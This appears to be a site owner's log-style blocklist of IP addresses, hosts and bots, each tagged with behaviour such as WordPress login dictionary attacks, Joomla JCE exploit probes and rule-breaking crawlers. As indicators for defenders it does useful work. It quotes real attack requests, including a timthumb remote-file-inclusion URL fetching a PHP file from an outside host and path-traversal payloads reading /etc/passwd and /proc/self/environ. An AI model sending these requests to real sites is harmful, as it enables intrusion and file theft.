Host: Portugal – Lisbon Pt Comunicacoes Sa
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
77.78.104.141 Hostname: 141.104.78.77.gransy.com
Host: Czech Republic – Prague Casablanca Int
Web server: 5 websites
LinksCrawler Bot – rule breaker
User agent: LinksCrawler 0.1beta
50.63.144.181 Hostname: ip-50-63-144-181.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 64 websites
Hacker – dictionary attack on wp-login with username admin
50.62.42.245 Hostname: ip-50-62-42-245.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 10 websites
Hacker – dictionary attack on wp-login with username admin
205.196.209.187 Hostname: ps175754.dreamhost.com
Host: United States – San Francisco New Dream Network Llc
Web server: 3 websites
Hacker – dictionary attack on wp-login with username admin
173.255.232.130 Hostname: ewrap27.xydo.com
Host: United States – Newark Linode
Malicious user agent: Java/1.6.0_35
Linode
81.209.177.189 Hostname: bardolino2.netestate.de
Host: Germany – Muenchen Netestate Gmbh
netEstate NE Crawler
User agent: netEstate NE Crawler (+http://www.website-datenbank.de/)
81.38.154.18 Hostname: 18.Red-81-38-154.dynamicIP.rima-tde.net
Host: Spain – Valladolid Telefonica De Espana Sau
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
114.130.54.109 Host: Bangladesh – Dhaka Bangladesh Computer Council Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/agger.php?rf
128.210.10.145 Hostname: web.ics.purdue.edu
Host: United States – West Lafayette Purdue University
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
54.226.162.166 Hostname: ec2-54-236-163-167.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
BufferBot
User agent: BufferBot
54.236.163.167 Hostname: ec2-54-236-163-167.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
grokkit-crawler
User agent: grokkit-crawler (pdsupport @purediscovery.com)
184.154.224.19 Hostname: ns1.siteground256.com
Host: United States – Chicago Singlehop Inc.
Web server: 925 websites
Hacker – dictionary attack on wp-login with username admin
62.146.2.234 Hostname: ipx62036.ipxserver.de
Host: Germany – Hamburg Seolytics Gmbh
Domnutch-Bot
User agent: Domnutch-Bot/Nutch-1.0 (Domnutch; http: //www.Nutch.de/)
207.154.104.160 Hostname: hyperion.impulse.net
Host: United States – Santa Barbara Impulse Internet Services
Web server: 24 websites
Hacker – dictionary attack on wp-login with username admin
184.168.74.130 Hostname: ip-184-168-74-130.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 39 websites
Hacker – dictionary attack on wp-login with username admin
208.109.236.182 Hostname: ip-208-109-236-182.ip.secureserver.net
Host: United States – New York City Godaddy.com Llc
Web server: 7 websites
Hacker – dictionary attack on wp-login with username admin
69.60.98.176 Host: United States – Miami Serverpronto
Web server: 9 websites
Hacker – dictionary attack on wp-login with username admin
75.98.175.74 Hostname: ssr3.supercp.com
Host: United States – Houston A2 Hosting Inc.
Web server: 1366 websites
Hacker – dictionary attack on wp-login with username admin
99.6.253.73 Hostname: 99-6-253-73.lightspeed.alhbca.sbcglobal.net
Host: United States – Alhambra AT&T Internet Services
Bot faking server and browser agent
Malicious user agent: PHP/5.2.10
2.51.208.6 Host: United Arab Emirates – ‘ajman Emirates Telecommunications Corporation. Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
77.222.61.154 Hostname: vh54.sweb.ru
Host: Russian Federation – Moscow Garant-park-telecom Ltd.
Web server: 1068 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/komos.php?rf
2.176.217.216 Host: Iran – Tehran Ip-pool For Adsl Users Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
93.175.222.2 Host: Ukraine – L’viv Pe Belokoputov Maksim Anatolievich
Web server: 19 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
212.33.246.9 Hostname: 212x33x246x9.static-business.perm.ertelecom.ru
Host: Russian Federation – Perm’ Cjsc Er-telecom Holding
Hacker – dictionary attack on wp-login with username admin
213.60.51.127 Hostname: 127.51.60.213.static.mundo-r.com
Host: Spain – A Coruna R Cable Y Telecomunicaciones Galicia S.a.
Hacker – dictionary attack on wp-login with username admin
177.99.172.126 Hostname: 177.99.172.126.static.gvt.net.br
Host: Brazil – Feira De Santana Ivi Tecnologia E Comunicacao Ltda
Hacker – dictionary attack on wp-login with username admin
190.31.221.122 Host: Argentina – Buenos Aires Apolo -gold-telecom-per Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
190.173.151.171 Host: Argentina – Buenos Aires Telefonica De Argentina Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
54.213.40.248 Hostname: ec2-54-213-40-248.us-west-2.compute.amazonaws.com
Host: United States – Portland Amazon.com Inc.
URLAppendBot
Corporate information spy bot
User agent: Mozilla/5.0 (compatible; URLAppendBot/1.0; +http: //www.profound.net/urlappendbot.html)
Misleading information – IP belongs to Amazon – no identifaction of user profound.net
77.252.131.11 Hostname: forcad.pl
Host: Poland – Poznan Budikom-komputerowe Wspomaganie Projektowania
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
190.202.253.41 Hostname: 190-202-253-41.dyn.dsl.cantv.net
Host: Venezuela – Caracas Cantv Servicios Venezuela
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
77.75.77.36 Hostname: fulltextrobot-77-75-77-36.seznam.cz
Host: Czech Republic – Prague Seznam.cz A.s.
SeznamBot
Scraper. Ignores robots.txt – rule breaker
User agent: SeznamBot/3.0 (+http: //fulltext.sblog.cz/)
129.2.12.99 Hostname: glam.umd.edu
Host: United States – College Park University Of Maryland
Malicious user agent: Python-urllib/2.6
82.154.208.8 Hostname: bl5-208-8.dsl.telepac.pt
Host: Portugal – Lisbon Pt Comunicacoes Sa
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
46.229.164.101 Host: Netherlands – Amsterdam Haldex Ltd SemrushBot
Does not get robots.txt – rule breaker
2.180.162.22 Host: Iran – Mashhad Telecommunication Company Of Khorasan Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
195.206.120.29 Hostname: mail02-athesis.athesis.it
Host: Romania – Fullwebserver S.r.l.
Web server: 2 websites – liberoreporter.eu , liberoreporter.it
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
//DOMAIN/xmlrpc.php%22%20/%3E%20%3C!–%5Bif%20lt%20IE%209%5D%3E%3Cscript%20src=%22http://DOMAIN/wp-content/themes/d5-business-line/scripts/timthumb.php?src=http://wordpress.com.pinoypc.net/dlc.php
Multiple fake user agents:
1) Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)
2) Gigabot/3.0 (http: //www.gigablast.com/spider.html)
3) FreeWebMonitoring SiteChecker/0.1 (+http: //www.freewebmonitoring.com)
4) Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
217.79.181.76 Hostname: f076.fuchsia.fastwebserver.de
Host: Germany – Dusseldorf Fast It Colocation
Scraper – MJ12 bot
User agent: Mozilla/5.0 (compatible; MJ12bot/v1.4.4; http: //www.majestic12.co.uk/bot.php?+)
1.4.169.239 Hostname: node-8a7.pool-1-4.dynamic.totbb.net
Host: Thailand – Phuket Tot Public Company Limited
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
113.193.32.45 Host: India – Mumbai Tikona Digital Networks Pvt. Ltd. Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
190.164.81.49 Hostname: pc-49-81-164-190.cm.vtr.net
Host: Chile – Antofagasta Vtr Banda Ancha S.a.
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
194.28.172.249 Hostname: dedic.dc.besthosting.ua
Host: Ukraine – Vinnytsya On-line Llc
Web server: 56 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/go.php?rf
66.103.141.247 Hostname: gnsweb5.getnetsmart.com
Host: United States – Orlando Interpro Services
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
82.98.146.48 Hostname: d354.dinaserver.com
Host: Spain – Madrid Dinahosting S.l.
Web server: 14 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
199.188.74.110 Hostname: posiblehost.com
Host: United States – Dallas Enzu Inc
User agent: Go http package
190.229.37.165 Hostname: host165.190-229-37.telecom.net.ar
Host: Argentina – Buenos Aires Apolo -gold-telecom-per
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
122.174.99.30 Hostname: ABTS-TN-dynamic-030.99.174.122.airtelbroadband.in
Host: India – Chetput Abts Tamilnadu
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
194.153.113.35 Host: Germany – Kassel Ibm Deutschland Gmbh oBot – Rule breaker, rubbish bot
User agent: Mozilla/5.0 (compatible; oBot/2.3.1; +http: //filterdb.iss.net/crawler/)
87.253.132.201 Hostname: 87-253-132-201.colo.transip.net
Host: Netherlands – Amsterdam Transip B.v.
Probably a scraper bot as it only gets RSS feeds
User agent: Go 1.1 package http
91.194.91.199 Hostname: m5008.contabo.net
Host: Germany – Muenchen Contabo Gmbh
Web server: 580 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/config.inc.php?rf
212.191.65.1 Hostname: xchg.math.uni.lodz.pl
Host: Poland – Lodz Technical University Of Lodz Computer Centre
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/config.inc.php?rf
107.160.158.82 Host: United States – Los Angeles Psychz Networks Bad host: Psychz Networks
Suspicious activity – canning for non existent files
/plus/e7xue.php (PDF download app)
This looks like a code injections attempt
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=
205.186.139.18 Hostname: mylastroof.com
Host: United States – Culver City Media Temple Inc.
Web server: 65 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/m3ksi.php?rf
82.75.112.208 Hostname: 524B70D0.cm-4-4b.dynamic.ziggo.nl
Host: Netherlands Groningen Ziggo Consumers
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
151.244.115.95 Hostname: 151-244-115-95.rasana.net
Host: Iran – Tehran Aria Shatel Company Ltd
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
41.143.248.234 Host: Morocco – Tangier Ip Adsl Maroctelecom Hacker looking for scanning for exploits
176.123.31.5 Host: Moldova – Chisinau Cloudata Srl Hacker – Dictionary attack on WordPress username “admin”
199.190.45.201 Host: United States – Los Angeles Ucweb
ASN: CNNIC-CHINACACHE-AP Beijing Blue I.T Technologies Co.,Ltd
OrgName: ChinaCache North America, Inc
Bad user agent: UCWEB/2.0 (Java; U; MIDP-2.0; en-US; ) U2/1.0.0 UCBrowser/8.9.0.251 U2/1.0.0 Mobile UNTRUSTED/1.0
69.36.94.214 Host: United States – Simi Valley Siteserver Hosting Inc. Hacker looking for OpenFlashChart exploits
/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=lobex21.php
88.116.181.86 Host: Austria – Vienna Swoboda Autohandel Looking for admin exploits
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
195.37.227.84 Hostname: hal9000v.fh-bielefeld.de
Host: Germany – Berlin Fachhochschule Bielefeld
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
182.52.169.153 Hostname: node-xi1.pool-182-52.dynamic.totbb.net
Host: Thailand – Bangkok Tot Public Company Limited
Looking for admin exploits
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
85.214.88.82 Hostname: nousol.com
Host: Germany – Berlin Strato Ag
Web server: 1 website – nousol.com
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
87.253.132.202 Hostname: 87-253-132-202.colo.transip.net
Host: Netherlands – Amsterdam Transip B.v.
Probably a scraper bot as it only gets RSS feeds
User agent: Go 1.1 package http
82.224.158.239 Host: France – Colomiers Proxad/free Sas Malicious user agent: Java/1.6.0_25
207.182.143.242 Hostname: f2.8f.b6.static.xlhost.com
Host: United States – Columbus Xlhost.com Inc
Rubbish bot:
niki-bot
91.197.15.34 Hostname: ip-91-197-15-34.gadu-gadu.pl
Host: Poland – Warsaw Gg Network S.a.
Rubbish bots / rule breakert: GG PeekBot
User agent: AboutUsBot/Harpy (Website Analysis; http: //www.aboutus.org/Aboutus:Bot; help @ aboutus.org)
54.208.201.249 Hostname: ec2-54-208-201-249.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot: AboutUsBot/Harpy
User agent: GG PeekBot 2.0 ( http: //gg.pl/ http: //info.gadu-gadu.pl/praca )
151.236.36.17 Hostname: 151-236-36-17.static.as29550.net
Host: United Kingdom – Maidenhead Simply Transit Ltd
Web server: 22 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
81.22.244.17 Hostname: srv-e17.esp.mediateam.fi
Host: Finland – Espoo Mediam Oy
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/NerO.php?rf
217.113.158.226 Hostname: zs2-226.man.pulawy.pl
Host: Poland – Pulawy Institute Of Soil Science And Plant Cultivation
Hacker looking for Joomla JCE exploit:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/dante.php?rf
202.5.192.3 Hostname: hosting.erdemnet.mn
Host: Mongolia – Ulaanbaatar Erdemnet Isp Center
Web server: 3 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
91.109.16.80 Hostname: hosting3.dashost.com
Host: Germany – Frankfurt Am Main Leaseweb Germany Gmbh
Web server: 87 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
193.25.166.81 Host: Poland – Katowice Expro Sp. Z O.o.
Web server: 259 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
209.217.76.227 Host: Canada – Ottawa Magma Communications Ltd Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
85.100.59.106 Hostname: 85.100.59.106.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Dictionary attack with username admin
82.224.158.239 Hostname: min31-2-82-224-158-239.fbx.proxad.net
Host: France – Colomiers Proxad/free Sas
Malicious user agent: Java/1.6.0_25
93.115.87.40 Hostname: lh18836.voxility.net
Host: Romania – Balotesti Voxility Srl
Web server: 1 website – tomsshoesaleoutlet.com
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Examples: 1) //images/stories/myblack.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
3) //images/stories/zoneh.php
67.212.165.162 Hostname: server.tribalhost.org
Host: United States – Chicago Singlehop Inc.
Web server: 4 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Examples: 1) /images/stories/dante.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
202.143.147.228 Host: Thailand – Bangkok Static Ip For Schools And Offices Under Administrative Of Ministry Of Education Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
151.237.177.88 Hostname: ptr88.newlooksdeal.com
Host: Sweden – Stockholm Deepak Mehta Fie
Web server: 1 website – cheapmichaelkorszone.net
Spammer / spam bot
77.75.73.36 Hostname: fulltextrobot-77-75-73-36.seznam.cz
Host: Czech Republic – Prague Seznam.cz A.s.
Rule breaker bot / scraper
User agent: SeznamBot/3.0 (+http: //fulltext.sblog.cz/)
65.36.241.79 Hostname: pm79.internetseer.com
Host: United States – Newark Internetseer.com Corp.
Rule breaker bot
User agent: InternetSeer.com
207.182.143.114 Hostname: 72.8f.b6.static.xlhost.com
Host: United States – Columbus Xlhost.com Inc
niki-bot
46.37.14.4 Hostname: host4-14-37-46.serverdedicati.aruba.it
Host: Italy – Arezzo Aruba S.p.a.
Web server: 10 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
78.4.254.173 Hostname: isp1ns2.noitel.it
Host: Italy – Roma Bt Italia S.p.a.
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Examples: 1) /images/stories/3xp.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
81.2.210.3 Hostname: future.vesim.cz
Host: Czech – Republic Prague Internet Cz A.s.
Web server: 112 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1
Examples: 1) /images/stories/komo.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
5.9.18.110 Hostname: ns5.tomas.uz
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 180 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Examples: 1) //images/stories/morocanz.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
211.129.81.174 Hostname: p21174-ipbffx02hodogaya.kanagawa.ocn.ne.jp
Host: Japan – Yokohama Open Computer Network
Runs several rule breaker bots:
1) siclab (cboc-test@lab.ntt.co.jp)
2) pflab (co2h2onacl@gmail.com)
3) ichiro/4.0 (http: //help.goo.ne.jp/door/crawler.html)
4)DoCoMo/2.0 P901i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http: //help.goo.ne.jp/door/crawler.html)
Does not read robots.tx
212.172.221.19 Hostname: psa2.webhoster.ag
Host: Germany – Quedlinburg Webhoster.de Ag
Web server: 1 website – v-server.de
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/d5-business-line/lib/scripts/timthumb.php?src=http: //wordpress.com.pinoypc.net/dlc.php
Multiple fake user agents:
1) Mozilla/5.0 (compatible;Baiduspider/2.0;+http: //www.baidu.com/search/spider.html)
2) Gigabot/3.0 (http: //www.gigablast.com/spider.html)
3) FreeWebMonitoring SiteChecker/0.1 (+http: //www.freewebmonitoring.com)
4) Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
94.23.40.154 Hostname: ns369061.ovh.net
Host: France – Clermont-ferrand Ovh Systems
Web server: 15 websites
Hacker looking for multiple file inclusion exploits:
Examples: (too many to list all)
1) /bcoos/modules/news/?xoopsOption[pagetype]=../../../../../../../../etc/passwd%00
2) /modules/fax/index.php?module=../../../../../../etc/passwd%00
3) /data/compatible.php?module_name=../../../../../../../../etc/passwd%00
69.84.207.246 Hostname: security.lightspeedsystems.com
Host: United States – Bakersfield Lightspeed Technologies
LightspeedSystems bot
Rule breaker – ignores or doesn’t get robots.txt
User agents:
1) LSSRocketCrawler/1.0 LightspeedSystems
2) Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1;.NET CLR 1.1.4322;.NET CLR 2.0.50727;.NET CLR 3.0.04506.30) Lightspeedsystems
77.244.185.135 Hostname: web2.viamatica.it
Host: Italy – Treviolo Planetel Srl
Web server: 7 websites
Trying to access site admin
78.138.120.199 Hostname: reserve.alsoisp.net
Host: Germany – Duisburg Mantwill Edv
Web server: 1481 websites
Hacker looking for multiple file inclusion exploits:
/modules/groupadm/index.php?module=../../../../../../etc/passwd%00/modules/groupadm/index.php?module=../../../../../../etc/passwd%00
/gwebmail/?module=../../../../etc/passwd%00
/components/je-media-player.html?view=../../../../../../../../../../etc/passwd%00
/KikChat/private.php?name=../../../../../../../../../../etc/passwd%00
85.114.137.97 Hostname: i097.indigo.fastwebserver.de
Host: Germany – Dusseldorf Fast It Colocation
Web server: 10 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
194.201.253.2 Hostname: makao.kenyaweb.com
Host: Kenya – Nairobi Form-net Africa Kenya
Web server: 166 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) //images/stories/explore.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
67.208.183.235 Hostname: 67.208.183.235.nyc.electricfiber.net
Host: United States – Boston Sidera Networks Llc
Banned user agent:
Nuance/Tegic Linguistics Team
80.78.243.24 Host: Russian Federation – Moscow Agava Ltd.
Web server: 8 websites
Hacker attempting known SiteGo cross site scripting / local file exclusion exploit
//site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../../../../../../../../../../../../..
/../../../../../..//proc/self/environ%0000
152.92.241.5 Host: Brazil – Rio De Janeiro Uerj – Universidade Do Estado Do Rio De Janeiro WordPress admin login attack
71.5.110.140 Host: United States Anoka Kettle River Consulting
Web server: 2 websites – mtgfinder.com , revealurl.net
Banned user agent:
Apache-HttpClient/4.2.1 (java 1.5)
97.74.112.47 Hostname: ip-97-74-112-47.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 29 websites
WordPress admin login attack
50.63.130.155 Hostname: ip-50-63-130-155.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 31 websites
WordPress admin login attack
41.215.236.23 Hostname: 23.236.215.41.reverse.rsawebcloud.com
Host: South Africa – Claremont Network Resources – Datacenter1&
Web server: 6 websites
WordPress admin login attack
68.64.155.162 Hostname: h152.cpanellogin.net
Host: United States – Glendale Cpanellogin.net
Web server: 348 websites
WordPress admin login attack
69.64.34.185 Hostname: eagle172.server4you.net
Host: United States – Saint Louis Hosting Solutions International Inc.
Web server: 46 websites
WordPress admin login attack
85.214.141.105 Hostname: h1998317.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 7 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Examples: 1) //images/stories/racrew.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
141.8.196.23 Hostname: mbusiki.from.sh
Host: Russian Federation – Saint Petersburg Sprinthost.ru Llc
Web server: 25 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Examples: 1) /content//images/stories/3xp.php
95.211.130.117 Hostname: mail.ilpolipopiero.it
Host: Netherlands – Amsterdam Leaseweb B.v.
Web server: 29 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Examples: 1) /content//images/stories/3xp.php
